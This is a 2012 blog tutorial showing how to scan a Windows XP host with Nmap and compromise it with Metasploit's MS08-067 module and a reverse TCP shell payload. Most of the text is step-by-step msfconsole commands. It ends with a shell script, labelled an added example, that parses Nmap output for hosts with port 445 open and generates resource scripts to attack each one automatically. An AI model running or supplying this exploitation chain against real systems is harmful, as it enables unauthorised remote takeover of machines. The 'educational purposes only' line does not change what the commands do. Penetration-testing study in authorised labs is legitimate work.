Thursday 8 March 2012

How to use Metasploit & Nmap

In this blog I will show you how to use Metasploit and Nmap together. Throughout the post I will use BackTrack; you can use any OS, just download the Metasploit Framework and Nmap for that OS and install them.

First we need to understand some basic terms:
Vulnerability => a weakness in a system which allows an attacker to compromise its security.
Exploit => code which takes advantage of a vulnerability to get control of a vulnerable system.
Payload => the code that actually runs on the system after the exploit has succeeded (for example a command shell that connects back to you).


How does this work?
First the attacker finds a vulnerability in the victim system. Then he uses an exploit for that vulnerability to gain access. Once the exploit has succeeded, the payload runs on the system and does whatever task the attacker chose: erasing, downloading or uploading files, adding users, giving access to cmd, and so on.


First we will ping the victim to check whether it is up or not (note that a host with ICMP blocked by a firewall will not reply to ping but may still be up; Nmap's own host discovery will catch that).


To find vulnerabilities we will use Nmap (you can use Nessus or any other tool if you want).
Step 1:- Scan using Nmap.
                You can use either the CLI or the GUI (Zenmap) for this.
                In the CLI the command is "nmap -v -A [host ip]"
                                Eg. nmap -v -A 192.168.1.1
                -A enables aggressive scanning: OS detection, service/version detection, default NSE scripts and traceroute, which tells you what is listening on each open port and which OS the host is probably running.
                -v makes the output verbose (it does not select which ports are scanned; by default Nmap scans the 1000 most common TCP ports, use -p to change that).

              
Look at the ports that are open on the victim system and at the service versions Nmap reports for them; that decides which exploit we can use for the attack.


It will show you a result like this (screenshot). In this example we will be using a Windows XP machine as the victim PC; the important part of the result is that it has SMB open on port 445.


Step 2:- Start Metasploit
                If you are starting it for the first time then I suggest you update it first with the command "msfupdate".
                Once it is updated you can start it with the "msfconsole" command.

After starting, it will show you a prompt like this (screenshot):




Now we will use an exploit (I will use only one exploit in this blog but I suggest you learn about other exploits also; "search smb" inside msfconsole lists the SMB modules).
Just give the command "use [path and name of exploit]"
eg. "use exploit/windows/smb/ms08_067_netapi"
This module attacks MS08-067, a vulnerability in the Windows Server service that Microsoft patched in October 2008. It only works against an unpatched host that exposes SMB (port 445), and its targets are mainly Windows 2000, XP and Server 2003, which is why it is demonstrated against XP here.





Now use the "show options" command to see the available options of the exploit.

 

The payload can be set with the command "set payload [path & name of payload]"
               eg. "set payload windows/shell/reverse_tcp" (this payload makes the victim connect back to your machine and gives you its command prompt)



Now use the "show options" command again to see the available options of both the exploit and the payload.



The green circles in the above image are the required fields for the exploit and payload to run successfully.
RHOST is the IP address of the victim's system. LHOST is the IP address of your own system, which the reverse_tcp payload connects back to, so it must be an address the victim can reach (check it with "ifconfig"); LPORT is the port it connects back to and defaults to 4444.
RHOST and LHOST are set with the commands "set rhost [victim ip add]" and "set lhost [your ip add]".



After giving all the options you can verify them with the command "show options".



 To run the exploit give the command "exploit" and it will attack. If it succeeds you get a "Command shell session 1 opened" message and a cmd prompt on the victim; if the host is patched or the target is wrong the module simply fails and you get no session.
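The whole procedure above (scan, pick the hosts with SMB open, set RHOST/LHOST, run the module) can be scripted so it is repeatable. The following is an added example written for this post, not code from the original post or from the Metasploit project. It assumes the Nmap scan was saved in grepable format with "-oG" and that Metasploit replays commands from a resource file with "msfconsole -r file.rc"; the scan output in sample_scan, the attacker address 192.168.1.2 and the function names are constructed for the example.

```shell
#!/bin/sh
# Added example: pipeline from an nmap -oG scan to a Metasploit resource script.
# Not from the original post. Sample scan output below is CONSTRUCTED, not a capture.

# Constructed -oG output: one tab-separated line per host, "Ports:" entries are
# "<port>/<state>/<proto>/<owner>/<service>/<rpc>/<version>/" separated by ", ".
sample_scan() {
    printf '# Nmap 5.61TEST4 scan initiated as: nmap -v -A -oG scan.gnmap 192.168.1.0/24\n'
    printf 'Host: 192.168.1.1 ()\tStatus: Up\n'
    printf 'Host: 192.168.1.1 ()\tPorts: 80/open/tcp//http//Linksys WRT54G http config/\tIgnored State: closed (999)\n'
    printf 'Host: 192.168.1.5 ()\tStatus: Up\n'
    printf 'Host: 192.168.1.5 ()\tPorts: 135/open/tcp//msrpc//Microsoft Windows RPC/, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds//Microsoft Windows XP microsoft-ds/\tOS: Microsoft Windows XP SP2 or SP3\n'
    printf 'Host: 192.168.1.9 ()\tStatus: Up\n'
    printf 'Host: 192.168.1.9 ()\tPorts: 22/open/tcp//ssh//OpenSSH 5.3/, 445/closed/tcp//microsoft-ds///\tOS: Linux 2.6.X\n'
    printf '# Nmap done -- 256 IP addresses (3 hosts up) scanned\n'
}

# hosts_with_open_port PORT: read -oG output on stdin, print every host IP that
# has PORT/open/tcp in its Ports field (a closed or filtered 445 does not count).
hosts_with_open_port() {
    awk -v p="$1" '
        BEGIN { FS = "\t" }
        /^Host: / {
            split($1, h, " "); ip = h[2]
            for (j = 2; j <= NF; j++) {
                if ($j ~ /^Ports: /) {
                    n = split(substr($j, 8), entries, ", ")
                    for (i = 1; i <= n; i++) {
                        split(entries[i], f, "/")
                        if (f[1] == p && f[2] == "open" && f[3] == "tcp") { print ip; break }
                    }
                }
            }
        }'
}

# is_ipv4 ADDR: four dotted decimal octets, each 0-255. Used so a typo in
# RHOST/LHOST is caught before the resource script is written.
is_ipv4() {
    echo "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
    old_ifs=$IFS; IFS=.
    set -- $1
    IFS=$old_ifs
    for octet in "$@"; do
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# ms08_067_rc RHOST LHOST [LPORT]: print the msfconsole commands from the post
# as a resource script. Run it with: msfconsole -r attack.rc
ms08_067_rc() {
    rhost="$1"; lhost="$2"; lport="${3:-4444}"   # 4444 is Metasploit's default LPORT
    is_ipv4 "$rhost" && is_ipv4 "$lhost" || return 1
    printf 'use exploit/windows/smb/ms08_067_netapi\n'
    printf 'set PAYLOAD windows/shell/reverse_tcp\n'
    printf 'set RHOST %s\n' "$rhost"
    printf 'set LHOST %s\n' "$lhost"
    printf 'set LPORT %s\n' "$lport"
    printf 'show options\n'
    printf 'exploit\n'
}

# Demo: only 192.168.1.5 has 445 open, so only one resource script is produced.
ATTACKER_IP=192.168.1.2   # assumed address of the BackTrack box (LHOST)
sample_scan | hosts_with_open_port 445 | while read -r victim; do
    echo "# resource script for $victim"
    ms08_067_rc "$victim" "$ATTACKER_IP"
done
```

In real use replace sample_scan with "cat scan.gnmap" after running "nmap -v -A -oG scan.gnmap [range]", redirect the output of ms08_067_rc to a file, and start Metasploit with "msfconsole -r" on that file; the "show options" line is kept so you can still verify the settings before the "exploit" line runs.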



 This blog is for educational purposes only. I hope it is useful; if you have any questions you can ask in the comments.



2 comments:

JooDean said...

This works only on windows xp, how on windows 7 and later version?
